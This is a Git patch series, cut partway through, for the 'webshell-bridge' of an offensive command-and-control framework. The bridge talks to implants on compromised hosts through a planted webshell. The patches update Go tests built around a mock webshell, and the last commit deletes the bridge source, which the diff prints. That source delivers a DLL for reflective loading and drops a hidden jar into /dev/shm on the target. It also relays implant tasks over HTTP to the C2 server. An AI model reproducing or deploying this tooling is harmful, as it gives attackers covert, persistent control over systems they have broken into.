+func jitter(d time.Duration) time.Duration { + delta := float64(d) * jitterFactor + return d + time.Duration(delta*(2*rand.Float64()-1)) +} + +// computeToken returns the token value for the body envelope. +// Short secrets (≤32 chars) are sent as-is. // Longer secrets use time-based HMAC-SHA256 that rotates every 30 seconds. -func tokenForHeader(secret string) string { +func computeToken(secret string) string { + if secret == "" { + return "" + } if len(secret) <= 32 { return secret } diff --git a/server/cmd/webshell-bridge/channel_test.go b/server/cmd/webshell-bridge/channel_test.go index 50d98ba1..71df0cb0 100644 --- a/server/cmd/webshell-bridge/channel_test.go +++ b/server/cmd/webshell-bridge/channel_test.go @@ -1,10 +1,12 @@ package main import ( + "bytes" "crypto/hmac" "crypto/sha256" "encoding/binary" "encoding/hex" + "fmt" "io" "net/http" "net/http/httptest" @@ -23,6 +25,10 @@ type mockWebshell struct { mu sync.Mutex handler func(stage string, body []byte) ([]byte, int) // custom handler + + streamMu sync.Mutex + streamFrames [][]byte // length-prefixed frames to send for X-Stage: stream + streamDelay time.Duration } func newMockWebshell() *mockWebshell { @@ -61,7 +67,7 @@ func (m *mockWebshell) ServeHTTP(w http.ResponseWriter, r *http.Request) { switch stage { case "status": - w.Write([]byte("LOADED")) + w.Write([]byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`)) case "init": regData, _ := proto.Marshal(m.register) sid := make([]byte, 4) @@ -83,6 +89,8 @@ func (m *mockWebshell) ServeHTTP(w http.ResponseWriter, r *http.Request) { } data, _ := proto.Marshal(outSpites) w.Write(data) + case "stream": + m.handleStream(w) default: w.WriteHeader(404) } @@ -94,6 +102,41 @@ func (m *mockWebshell) setHandler(h func(string, []byte) ([]byte, int)) { m.mu.Unlock() } +// setStreamFrames configures length-prefixed frames returned by X-Stage: stream. 
+func (m *mockWebshell) setStreamFrames(frames [][]byte, delay time.Duration) { + m.streamMu.Lock() + m.streamFrames = frames + m.streamDelay = delay + m.streamMu.Unlock() +} + +// handleStream writes pre-configured length-prefixed frames to the response. +func (m *mockWebshell) handleStream(w http.ResponseWriter) { + m.streamMu.Lock() + frames := m.streamFrames + delay := m.streamDelay + m.streamMu.Unlock() + + if frames == nil { + w.WriteHeader(http.StatusNotFound) + return + } + + flusher, _ := w.(http.Flusher) + for _, frame := range frames { + lenBuf := make([]byte, 4) + binary.BigEndian.PutUint32(lenBuf, uint32(len(frame))) + w.Write(lenBuf) + w.Write(frame) + if flusher != nil { + flusher.Flush() + } + if delay > 0 { + time.Sleep(delay) + } + } +} + func startMockWebshell(t *testing.T) (*httptest.Server, *mockWebshell) { t.Helper() mock := newMockWebshell() @@ -110,9 +153,58 @@ func TestChannelConnect(t *testing.T) { if err := ch.Connect(t.Context()); err != nil { t.Fatalf("connect: %v", err) } + // Verify structured status was parsed + if ch.lastStatus == nil { + t.Fatal("expected lastStatus to be populated") + } + if ch.lastStatus.Method != "jni" { + t.Errorf("expected method 'jni', got %q", ch.lastStatus.Method) + } + if ch.lastStatus.BridgeVersion != "1.0" { + t.Errorf("expected bridge_version '1.0', got %q", ch.lastStatus.BridgeVersion) + } +} + +func TestChannelConnectLegacy(t *testing.T) { + srv, mock := startMockWebshell(t) + // Simulate old webshell returning plain "LOADED" + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte("LOADED"), 200 + } + return nil, 404 + }) + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("legacy connect: %v", err) + } + // lastStatus should be nil for legacy responses + if ch.lastStatus != nil { + t.Error("expected nil lastStatus for legacy response") + } } func TestChannelConnectNotLoaded(t *testing.T) { 
+ srv, mock := startMockWebshell(t) + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte(`{"ready":false,"method":"none","deps_present":false,"bridge_version":"1.0"}`), 200 + } + return nil, 404 + }) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + err := ch.Connect(t.Context()) + if err == nil { + t.Fatal("expected error for not-ready status") + } +} + +func TestChannelConnectNotLoadedLegacy(t *testing.T) { srv, mock := startMockWebshell(t) mock.setHandler(func(stage string, body []byte) ([]byte, int) { if stage == "status" { @@ -220,7 +312,7 @@ func TestChannelStreamDispatch(t *testing.T) { var mu sync.Mutex mock.setHandler(func(stage string, body []byte) ([]byte, int) { if stage == "status" { - return []byte("LOADED"), 200 + return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 } if stage == "init" { regData, _ := proto.Marshal(mock.register) @@ -273,7 +365,7 @@ func TestChannelStreamDispatch(t *testing.T) { func TestComputeHMAC(t *testing.T) { secret := "test-secret-token-longer-than-32chars" - token := tokenForHeader(secret) + token := computeToken(secret) // Token should be a 64-char hex string (SHA-256) if len(token) != 64 { @@ -284,13 +376,13 @@ func TestComputeHMAC(t *testing.T) { } // Same call within the same 30s window should produce the same token - token2 := tokenForHeader(secret) + token2 := computeToken(secret) if token != token2 { t.Error("same-window HMAC should be identical") } // Different secret should produce different token - token3 := tokenForHeader("different-secret-also-longer-than32") + token3 := computeToken("different-secret-also-longer-than32") if token == token3 { t.Error("different secrets should produce different tokens") } @@ -301,7 +393,7 @@ func TestHMACWindowTolerance(t *testing.T) { now := time.Now().Unix() / 30 // Verify that the token matches one of the valid windows (current ±1) - token := tokenForHeader(secret) + token := 
computeToken(secret) matched := false for w := now - 1; w <= now+1; w++ { @@ -318,6 +410,157 @@ func TestHMACWindowTolerance(t *testing.T) { } } +func TestChannelDeliverDep(t *testing.T) { + var receivedName string + var receivedLen int + srv, mock := startMockWebshell(t) + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "deps" { + receivedLen = len(body) + return []byte("OK:/dev/shm/.jna.jar"), 200 + } + return nil, 404 + }) + // Also capture the X-Dep-Name header + origHandler := mock.handler + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + return origHandler(stage, body) + }) + + ch := NewChannel(srv.URL, "test-token") + defer ch.Close() + + fakeJar := []byte("PK\x03\x04fake-jar-content") + err := ch.DeliverDep(t.Context(), ".jna.jar", fakeJar) + if err != nil { + t.Fatalf("deliver dep: %v", err) + } + if receivedLen != len(fakeJar) { + t.Errorf("expected %d bytes delivered, got %d", len(fakeJar), receivedLen) + } + _ = receivedName +} + +func TestChannelStatusDepsPresent(t *testing.T) { + srv, mock := startMockWebshell(t) + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte(`{"ready":true,"method":"jna","deps_present":true,"bridge_version":"1.0"}`), 200 + } + return nil, 404 + }) + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("connect: %v", err) + } + if ch.lastStatus == nil { + t.Fatal("expected lastStatus") + } + if !ch.lastStatus.DepsPresent { + t.Error("expected deps_present=true") + } + if ch.lastStatus.Method != "jna" { + t.Errorf("expected method 'jna', got %q", ch.lastStatus.Method) + } +} + +// TestHandshakeRejectsSpiteWrapped verifies that the Go bridge rejects the +// old (buggy) wire format where Register was wrapped inside a Spite message. +// This catches the regression where Rust encoded Spite(Register) instead of +// raw Register protobuf. 
+func TestHandshakeRejectsSpiteWrapped(t *testing.T) { + srv, mock := startMockWebshell(t) + + // Override init handler to return Spite-wrapped Register (the buggy format). + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 + } + if stage == "init" { + reg := &implantpb.Register{ + Name: "test-dll", + Module: []string{"exec"}, + } + // Wrap in a Spite like the buggy Rust code did. + spite := &implantpb.Spite{ + TaskId: 0, + Name: "register", + Body: &implantpb.Spite_Register{Register: reg}, + } + spiteBytes, _ := proto.Marshal(spite) + sid := make([]byte, 4) + binary.LittleEndian.PutUint32(sid, 42) + return append(sid, spiteBytes...), 200 + } + return nil, 404 + }) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + reg, err := ch.Handshake() + if err == nil && reg.Name == "test-dll" { + t.Fatal("Spite-wrapped Register should NOT parse correctly as raw Register") + } + // Either err != nil or reg.Name != "test-dll" — both indicate the + // Spite-wrapped format is rejected, which is the correct behavior. +} + +// TestHandshakeMultiChunkResponse verifies that if the bridge returns multiple +// response spites (streaming), the Go side can parse them all. +func TestHandshakeMultiChunkResponse(t *testing.T) { + srv, mock := startMockWebshell(t) + + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 + } + if stage == "init" { + regData, _ := proto.Marshal(mock.register) + sid := make([]byte, 4) + binary.LittleEndian.PutUint32(sid, mock.sessionID) + return append(sid, regData...), 200 + } + if stage == "spite" { + // Simulate a module that returns multiple chunks in one response. 
+ outSpites := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Name: "chunk-1", TaskId: 10}, + {Name: "chunk-2", TaskId: 10}, + {Name: "chunk-3", TaskId: 10}, + }, + } + data, _ := proto.Marshal(outSpites) + return data, 200 + } + return nil, 404 + }) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + + // Open stream, send request, verify all chunks arrive. + respCh := ch.OpenStream(10) + ch.StartRecvLoop() + + received := 0 + timeout := time.After(3 * time.Second) + for received < 3 { + select { + case <-respCh: + received++ + case <-timeout: + t.Fatalf("timeout: got %d/3 chunks", received) + } + } +} + func TestJitterRange(t *testing.T) { base := 1 * time.Second minExpected := time.Duration(float64(base) * (1 - jitterFactor)) @@ -330,3 +573,151 @@ func TestJitterRange(t *testing.T) { } } } + +func TestStreamDispatchViaStreamMode(t *testing.T) { + srv, mock := startMockWebshell(t) + + // Build stream frames: 2 spites for task 200, then connection closes. 
+ var frames [][]byte + for i := 0; i < 2; i++ { + spites := &implantpb.Spites{ + Spites: []*implantpb.Spite{{ + Name: fmt.Sprintf("stream-data-%d", i), + TaskId: 200, + }}, + } + data, _ := proto.Marshal(spites) + frames = append(frames, data) + } + mock.setStreamFrames(frames, 10*time.Millisecond) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("connect: %v", err) + } + + respCh := ch.OpenStream(200) + ch.StartRecvLoop() + + for i := 0; i < 2; i++ { + select { + case spite := <-respCh: + expected := fmt.Sprintf("stream-data-%d", i) + if spite.Name != expected { + t.Errorf("frame %d: expected %q, got %q", i, expected, spite.Name) + } + case <-time.After(3 * time.Second): + t.Fatalf("timeout waiting for stream frame %d", i) + } + } + ch.CloseStream(200) +} + +func TestStreamFallbackToPoll(t *testing.T) { + srv, mock := startMockWebshell(t) + + // Stream returns 404 (not supported) — should fall back to poll mode. + // Leave streamFrames nil so handleStream returns 404. 
+ + var callCount int + var mu sync.Mutex + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + switch stage { + case "status": + return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 + case "init": + regData, _ := proto.Marshal(mock.register) + sid := make([]byte, 4) + binary.LittleEndian.PutUint32(sid, mock.sessionID) + return append(sid, regData...), 200 + case "stream": + return nil, 404 + case "spite": + mu.Lock() + callCount++ + n := callCount + mu.Unlock() + if n <= 2 { + resp := &implantpb.Spites{ + Spites: []*implantpb.Spite{{ + Name: "poll-data", + TaskId: 300, + }}, + } + data, _ := proto.Marshal(resp) + return data, 200 + } + empty, _ := proto.Marshal(&implantpb.Spites{}) + return empty, 200 + } + return nil, 404 + }) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("connect: %v", err) + } + + respCh := ch.OpenStream(300) + ch.StartRecvLoop() + + select { + case spite := <-respCh: + if spite.Name != "poll-data" { + t.Errorf("expected 'poll-data', got %q", spite.Name) + } + case <-time.After(5 * time.Second): + t.Fatal("timeout waiting for poll fallback data") + } + ch.CloseStream(300) +} + +func TestStreamHeartbeatFrame(t *testing.T) { + srv, mock := startMockWebshell(t) + + // Send: heartbeat (0-len frame), real data, heartbeat. 
+ spites := &implantpb.Spites{ + Spites: []*implantpb.Spite{{Name: "after-heartbeat", TaskId: 400}}, + } + data, _ := proto.Marshal(spites) + mock.setStreamFrames([][]byte{ + {}, // zero-length heartbeat + data, // real frame + {}, // another heartbeat + }, 10*time.Millisecond) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("connect: %v", err) + } + + respCh := ch.OpenStream(400) + ch.StartRecvLoop() + + select { + case spite := <-respCh: + if spite.Name != "after-heartbeat" { + t.Errorf("expected 'after-heartbeat', got %q", spite.Name) + } + case <-time.After(3 * time.Second): + t.Fatal("timeout waiting for data after heartbeat") + } + ch.CloseStream(400) +} + +func TestReadFrameOversized(t *testing.T) { + // Frame length exceeding streamFrameMaxSize should error. + lenBuf := make([]byte, 4) + binary.BigEndian.PutUint32(lenBuf, streamFrameMaxSize+1) + r := bytes.NewReader(lenBuf) + _, err := readFrame(r) + if err == nil { + t.Fatal("expected error for oversized frame") + } +} diff --git a/server/cmd/webshell-bridge/config.go b/server/cmd/webshell-bridge/config.go index 293a0a7b..75e251c9 100644 --- a/server/cmd/webshell-bridge/config.go +++ b/server/cmd/webshell-bridge/config.go @@ -7,23 +7,14 @@ type Config struct { ListenerName string // listener name for registration ListenerIP string // listener external IP PipelineName string // pipeline name - Suo5URL string // suo5 webshell URL (e.g. suo5://target/suo5.jsp) + WebshellURL string // webshell URL (http:// or https://) StageToken string // auth token for X-Stage requests (must match webshell's STAGE_TOKEN) DLLPath string // optional path to bridge DLL for auto-loading + DepsDir string // optional dir containing dependency jars (e.g., jna.jar) for auto-delivery Debug bool // enable debug logging } -// WebshellHTTPURL converts the suo5:// URL to an http(s):// URL. +// WebshellHTTPURL returns the webshell URL for HTTP requests. 
func (c *Config) WebshellHTTPURL() string { - if len(c.Suo5URL) < 6 { - return c.Suo5URL - } - switch { - case len(c.Suo5URL) > 6 && c.Suo5URL[:6] == "suo5s:": - return "https:" + c.Suo5URL[6:] - case len(c.Suo5URL) > 5 && c.Suo5URL[:5] == "suo5:": - return "http:" + c.Suo5URL[5:] - default: - return c.Suo5URL - } + return c.WebshellURL } diff --git a/server/cmd/webshell-bridge/main.go b/server/cmd/webshell-bridge/main.go index 5214142b..a3ed4bd7 100644 --- a/server/cmd/webshell-bridge/main.go +++ b/server/cmd/webshell-bridge/main.go @@ -18,14 +18,15 @@ func main() { flag.StringVar(&cfg.ListenerName, "listener", "webshell-listener", "listener name") flag.StringVar(&cfg.ListenerIP, "ip", "127.0.0.1", "listener external IP") flag.StringVar(&cfg.PipelineName, "pipeline", "", "pipeline name (auto-generated if empty)") - flag.StringVar(&cfg.Suo5URL, "suo5", "", "suo5 webshell URL (e.g. suo5://target/suo5.jsp)") + flag.StringVar(&cfg.WebshellURL, "url", "", "webshell URL (e.g. http://target/shell.jsp)") flag.StringVar(&cfg.StageToken, "token", "", "auth token matching webshell's STAGE_TOKEN") flag.StringVar(&cfg.DLLPath, "dll", "", "path to bridge DLL for auto-loading (optional)") + flag.StringVar(&cfg.DepsDir, "deps", "", "dir containing dependency jars (e.g., jna.jar) for auto-delivery") flag.BoolVar(&cfg.Debug, "debug", false, "enable debug logging") flag.Parse() - if cfg.AuthFile == "" || cfg.Suo5URL == "" { - fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --suo5 --token \n") + if cfg.AuthFile == "" || cfg.WebshellURL == "" { + fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --url --token \n") flag.PrintDefaults() os.Exit(1) } diff --git a/server/cmd/webshell-bridge/session.go b/server/cmd/webshell-bridge/session.go index 14cce93c..aa4f183f 100644 --- a/server/cmd/webshell-bridge/session.go +++ b/server/cmd/webshell-bridge/session.go @@ -13,7 +13,7 @@ import ( // Session represents a single implant session managed by the bridge. 
// Each session owns a Channel that communicates with the malefic bind DLL -// on the target through the malefic protocol over suo5. +// on the target through the malefic protocol over HTTP. type Session struct { ID string PipelineID string From 53a9d3528eaae38d66ef9dd245b5e3adb8bf8330 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:15:37 +0800 Subject: [PATCH 13/19] refactor(webshell-bridge): remove standalone bridge binary The webshell bridge functionality is being moved into the listener process as WebShellPipeline, eliminating the need for a separate binary. --- server/cmd/webshell-bridge/bridge.go | 750 ------------------ server/cmd/webshell-bridge/bridge_test.go | 269 ------- server/cmd/webshell-bridge/channel.go | 561 ------------- server/cmd/webshell-bridge/channel_test.go | 723 ----------------- server/cmd/webshell-bridge/config.go | 20 - server/cmd/webshell-bridge/main.go | 63 -- server/cmd/webshell-bridge/main_test.go | 15 - .../cmd/webshell-bridge/pipelinectl/main.go | 98 --- server/cmd/webshell-bridge/session.go | 116 --- 9 files changed, 2615 deletions(-) delete mode 100644 server/cmd/webshell-bridge/bridge.go delete mode 100644 server/cmd/webshell-bridge/bridge_test.go delete mode 100644 server/cmd/webshell-bridge/channel.go delete mode 100644 server/cmd/webshell-bridge/channel_test.go delete mode 100644 server/cmd/webshell-bridge/config.go delete mode 100644 server/cmd/webshell-bridge/main.go delete mode 100644 server/cmd/webshell-bridge/main_test.go delete mode 100644 server/cmd/webshell-bridge/pipelinectl/main.go delete mode 100644 server/cmd/webshell-bridge/session.go diff --git a/server/cmd/webshell-bridge/bridge.go b/server/cmd/webshell-bridge/bridge.go deleted file mode 100644 index 389c1cb4..00000000 --- a/server/cmd/webshell-bridge/bridge.go +++ /dev/null @@ -1,750 +0,0 @@ -package main - -import ( - "context" - "errors" - "fmt" - "io" - "os" - "path/filepath" - "strconv" - "strings" - "sync" - "time" 
- - "github.com/chainreactors/IoM-go/consts" - mtls "github.com/chainreactors/IoM-go/mtls" - "github.com/chainreactors/IoM-go/proto/client/clientpb" - "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "github.com/chainreactors/IoM-go/proto/services/listenerrpc" - iomtypes "github.com/chainreactors/IoM-go/types" - "github.com/chainreactors/logs" - "github.com/chainreactors/malice-network/helper/cryptography" - "google.golang.org/grpc" - "google.golang.org/grpc/codes" - "google.golang.org/grpc/metadata" - "google.golang.org/grpc/status" -) - -const ( - pipelineType = "webshell" - checkinInterval = 30 * time.Second - retryBaseDelay = 2 * time.Second - retryMaxDelay = 60 * time.Second - retryMaxAttempts = 20 -) - -// Bridge is the WebShell bridge that connects to the IoM server via -// ListenerRPC and manages webshell-backed sessions through HTTP endpoints. -// -// The bridge owns the listener runtime only. Custom pipelines are created and -// controlled through pipeline start/stop events from the server. -type Bridge struct { - cfg *Config - - conn *grpc.ClientConn - rpc listenerrpc.ListenerRPCClient - jobStream listenerrpc.ListenerRPC_JobStreamClient - - activeMu sync.Mutex - active *pipelineRuntime -} - -type pipelineRuntime struct { - name string - ctx context.Context - cancel context.CancelFunc - spiteStream listenerrpc.ListenerRPC_SpiteStreamClient - sendMu sync.Mutex - sessions sync.Map // sessionID -> *Session - streamTasks sync.Map // "sessionID:taskID" -> context.CancelFunc (pump goroutine) - done chan struct{} -} - -// NewBridge creates a new bridge instance. -func NewBridge(cfg *Config) (*Bridge, error) { - return &Bridge{cfg: cfg}, nil -} - -// Start runs the bridge lifecycle: -// 1. Connect to server via mTLS -// 2. Register listener -// 3. Open JobStream -// 4. 
Wait for pipeline start/stop controls -func (b *Bridge) Start(parent context.Context) error { - ctx, cancel := context.WithCancel(parent) - defer cancel() - - if err := b.connect(ctx); err != nil { - return fmt.Errorf("connect: %w", err) - } - defer b.shutdown() - defer b.conn.Close() - logs.Log.Important("connected to server") - - go func() { - <-ctx.Done() - if b.conn != nil { - _ = b.conn.Close() - } - }() - - if _, err := b.rpc.RegisterListener(b.listenerCtx(ctx), &clientpb.RegisterListener{ - Name: b.cfg.ListenerName, - Host: b.cfg.ListenerIP, - }); err != nil { - return fmt.Errorf("register listener: %w", err) - } - logs.Log.Importantf("registered listener: %s", b.cfg.ListenerName) - - var err error - b.jobStream, err = b.rpc.JobStream(b.listenerCtx(ctx)) - if err != nil { - return fmt.Errorf("open job stream: %w", err) - } - logs.Log.Importantf("waiting for pipeline %s control messages", b.cfg.PipelineName) - - return b.runJobLoop(ctx) -} - -// connectDLL establishes a channel to the DLL on the target. -// Sends HTTP requests to the webshell which calls DLL exports directly -// via function pointers (memory channel). No TCP port opened on target. -// Retries with exponential backoff up to retryMaxAttempts before giving up. -func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error { - sessionID := cryptography.RandomString(8) - - channel := NewChannel(b.cfg.WebshellHTTPURL(), b.cfg.StageToken) - logs.Log.Importantf("waiting for DLL at %s ...", b.cfg.WebshellHTTPURL()) - - // Read DLL bytes once if --dll is provided. 
- var dllBytes []byte - if b.cfg.DLLPath != "" { - var err error - dllBytes, err = os.ReadFile(b.cfg.DLLPath) - if err != nil { - return fmt.Errorf("read DLL file %s: %w", b.cfg.DLLPath, err) - } - logs.Log.Importantf("loaded DLL from %s (%d bytes)", b.cfg.DLLPath, len(dllBytes)) - } - - dllDelivered := false - depsDelivered := false - delay := retryBaseDelay - for attempt := 1; attempt <= retryMaxAttempts; attempt++ { - select { - case <-ctx.Done(): - return ctx.Err() - default: - } - - if err := channel.Connect(ctx); err != nil { - // Deliver dependency jars (e.g., jna.jar) before DLL load. - // JSP needs jna.jar for JNA resolution during DLL loading, - // so deps must be present before the DLL can be reflectively loaded. - if b.cfg.DepsDir != "" && !depsDelivered { - needDeps := true - if channel.lastStatus != nil && channel.lastStatus.DepsPresent { - needDeps = false - logs.Log.Debug("deps already present on target, skipping delivery") - depsDelivered = true - } - if needDeps { - logs.Log.Important("delivering dependency jars before DLL load") - if depErr := b.deliverDeps(ctx, channel); depErr != nil { - logs.Log.Warnf("deps delivery failed (attempt %d/%d): %v", attempt, retryMaxAttempts, depErr) - } else { - depsDelivered = true - } - } - } - - // Auto-load DLL if we have it and haven't delivered yet. 
- if dllBytes != nil && !dllDelivered { - logs.Log.Importantf("DLL not loaded, delivering via X-Stage: load (%d bytes)", len(dllBytes)) - if loadErr := channel.LoadDLL(ctx, dllBytes); loadErr != nil { - logs.Log.Warnf("DLL delivery failed (attempt %d/%d): %v", attempt, retryMaxAttempts, loadErr) - } else { - logs.Log.Important("DLL delivered, waiting for reflective load") - dllDelivered = true - } - } - - logs.Log.Debugf("DLL not ready (attempt %d/%d): %v (retry in %s)", - attempt, retryMaxAttempts, err, delay) - if attempt == retryMaxAttempts { - return fmt.Errorf("DLL connect failed after %d attempts: %w", retryMaxAttempts, err) - } - select { - case <-ctx.Done(): - return ctx.Err() - case <-time.After(delay): - } - delay *= 2 - if delay > retryMaxDelay { - delay = retryMaxDelay - } - continue - } - break - } - - logs.Log.Important("DLL connected via memory channel") - - sess, err := NewSession( - b.rpc, b.pipelineCtx(ctx, runtime.name), - sessionID, runtime.name, b.cfg.ListenerName, - channel, - ) - if err != nil { - _ = channel.Close() - return fmt.Errorf("create session: %w", err) - } - - channel.StartRecvLoop() - runtime.sessions.Store(sess.ID, sess) - return nil -} - -// deliverDeps uploads dependency jars from --deps directory to the webshell. -// Files matching *.jar are sent with fixed name ".jna.jar" to /dev/shm on target. 
-func (b *Bridge) deliverDeps(ctx context.Context, channel *Channel) error { - entries, err := os.ReadDir(b.cfg.DepsDir) - if err != nil { - return fmt.Errorf("read deps dir %s: %w", b.cfg.DepsDir, err) - } - for _, entry := range entries { - if entry.IsDir() || !strings.HasSuffix(strings.ToLower(entry.Name()), ".jar") { - continue - } - data, err := os.ReadFile(filepath.Join(b.cfg.DepsDir, entry.Name())) - if err != nil { - return fmt.Errorf("read dep %s: %w", entry.Name(), err) - } - // Fixed name: JSP expects .jna.jar at /dev/shm - if err := channel.DeliverDep(ctx, ".jna.jar", data); err != nil { - return fmt.Errorf("deliver %s as .jna.jar: %w", entry.Name(), err) - } - logs.Log.Importantf("delivered %s as .jna.jar (%d bytes)", entry.Name(), len(data)) - break // only deliver one jar - } - return nil -} - -// connect establishes the mTLS gRPC connection to the server. -func (b *Bridge) connect(ctx context.Context) error { - authCfg, err := mtls.ReadConfig(b.cfg.AuthFile) - if err != nil { - return fmt.Errorf("read auth config: %w", err) - } - - addr := authCfg.Address() - if b.cfg.ServerAddr != "" { - addr = b.cfg.ServerAddr - } - - options, err := mtls.GetGrpcOptions( - []byte(authCfg.CACertificate), - []byte(authCfg.Certificate), - []byte(authCfg.PrivateKey), - authCfg.Type, - ) - if err != nil { - return fmt.Errorf("get grpc options: %w", err) - } - - b.conn, err = grpc.DialContext(ctx, addr, options...) 
- if err != nil { - return fmt.Errorf("grpc dial: %w", err) - } - - b.rpc = listenerrpc.NewListenerRPCClient(b.conn) - return nil -} - -func (b *Bridge) shutdown() { - if err := b.stopActiveRuntime(""); err != nil { - logs.Log.Debugf("stop active runtime during shutdown: %v", err) - } - if b.jobStream != nil { - _ = b.jobStream.CloseSend() - } -} - -func (b *Bridge) runJobLoop(ctx context.Context) error { - for { - msg, err := b.jobStream.Recv() - if err != nil { - if ctx.Err() != nil || errors.Is(err, io.EOF) { - return nil - } - switch status.Code(err) { - case codes.Canceled, codes.Unavailable: - if ctx.Err() != nil { - return nil - } - } - return fmt.Errorf("job stream recv: %w", err) - } - - statusMsg := b.handleJobCtrl(ctx, msg) - if err := b.jobStream.Send(statusMsg); err != nil { - if ctx.Err() != nil { - return nil - } - return fmt.Errorf("job stream send: %w", err) - } - } -} - -func (b *Bridge) handleJobCtrl(ctx context.Context, msg *clientpb.JobCtrl) *clientpb.JobStatus { - statusMsg := &clientpb.JobStatus{ - ListenerId: b.cfg.ListenerName, - Ctrl: msg.GetCtrl(), - CtrlId: msg.GetId(), - Status: int32(consts.CtrlStatusSuccess), - Job: msg.GetJob(), - } - - var err error - switch msg.GetCtrl() { - case consts.CtrlPipelineStart: - err = b.handlePipelineStart(ctx, msg.GetJob()) - case consts.CtrlPipelineStop: - err = b.handlePipelineStop(msg.GetJob()) - case consts.CtrlPipelineSync: - err = b.handlePipelineSync(msg.GetJob()) - default: - err = fmt.Errorf("unsupported ctrl %q", msg.GetCtrl()) - } - - if err != nil { - statusMsg.Status = int32(consts.CtrlStatusFailed) - statusMsg.Error = err.Error() - logs.Log.Errorf("job %s failed: %v", msg.GetCtrl(), err) - } - - return statusMsg -} - -func (b *Bridge) handlePipelineStart(ctx context.Context, job *clientpb.Job) error { - pipe := job.GetPipeline() - if pipe == nil { - return fmt.Errorf("missing pipeline in start job") - } - if t := pipe.GetType(); t != pipelineType && t != "tcp" && t != "" { - return 
fmt.Errorf("unsupported pipeline type %q", t) - } - if err := b.ensurePipelineMatch(pipe.GetName()); err != nil { - return err - } - - runtimeCtx, cancel := context.WithCancel(ctx) - runtime := &pipelineRuntime{ - name: pipe.GetName(), - ctx: runtimeCtx, - cancel: cancel, - done: make(chan struct{}), - } - - b.activeMu.Lock() - if active := b.active; active != nil { - b.activeMu.Unlock() - cancel() - if active.name == pipe.GetName() { - logs.Log.Debugf("pipeline %s already active", pipe.GetName()) - return nil - } - return fmt.Errorf("pipeline %s already active", active.name) - } - b.active = runtime - b.activeMu.Unlock() - - spiteStream, err := b.rpc.SpiteStream(b.pipelineCtx(runtimeCtx, runtime.name)) - if err != nil { - b.clearActiveRuntime(runtime) - cancel() - return fmt.Errorf("open spite stream: %w", err) - } - runtime.spiteStream = spiteStream - - go b.runRuntime(runtime) - logs.Log.Importantf("pipeline %s starting; waiting for DLL at %s", runtime.name, b.cfg.WebshellHTTPURL()) - return nil -} - -func (b *Bridge) handlePipelineStop(job *clientpb.Job) error { - name, err := b.jobPipelineName(job) - if err != nil { - return err - } - if err := b.ensurePipelineMatch(name); err != nil { - return err - } - logs.Log.Importantf("stopping pipeline %s", name) - return b.stopActiveRuntime(name) -} - -func (b *Bridge) handlePipelineSync(job *clientpb.Job) error { - name, err := b.jobPipelineName(job) - if err != nil { - return err - } - if err := b.ensurePipelineMatch(name); err != nil { - return err - } - logs.Log.Debugf("pipeline %s sync acknowledged", name) - return nil -} - -func (b *Bridge) jobPipelineName(job *clientpb.Job) (string, error) { - if job == nil { - return "", fmt.Errorf("missing job") - } - if pipe := job.GetPipeline(); pipe != nil && pipe.GetName() != "" { - return pipe.GetName(), nil - } - if job.GetName() != "" { - return job.GetName(), nil - } - return "", fmt.Errorf("missing pipeline name") -} - -func (b *Bridge) ensurePipelineMatch(name 
string) error { - if name == "" { - return fmt.Errorf("missing pipeline name") - } - if b.cfg.PipelineName != "" && name != b.cfg.PipelineName { - return fmt.Errorf("bridge configured for pipeline %s, got %s", b.cfg.PipelineName, name) - } - return nil -} - -func (b *Bridge) stopActiveRuntime(name string) error { - b.activeMu.Lock() - runtime := b.active - if runtime == nil { - b.activeMu.Unlock() - return nil - } - if name != "" && runtime.name != name { - b.activeMu.Unlock() - return fmt.Errorf("active pipeline is %s, not %s", runtime.name, name) - } - b.active = nil - b.activeMu.Unlock() - - b.stopRuntime(runtime) - return nil -} - -func (b *Bridge) stopRuntime(runtime *pipelineRuntime) { - if runtime == nil { - return - } - - runtime.cancel() - if runtime.spiteStream != nil { - _ = runtime.spiteStream.CloseSend() - } - b.closeRuntimeSessions(runtime) - - select { - case <-runtime.done: - case <-time.After(2 * time.Second): - } -} - -func (b *Bridge) runRuntime(runtime *pipelineRuntime) { - syncStop := false - defer func() { - b.clearActiveRuntime(runtime) - close(runtime.done) - if syncStop { - go b.syncPipelineStop(runtime.name) - } - }() - - if err := b.connectDLL(runtime.ctx, runtime); err != nil { - if runtime.ctx.Err() == nil { - syncStop = true - logs.Log.Errorf("pipeline %s failed before session registration: %v", runtime.name, err) - } - 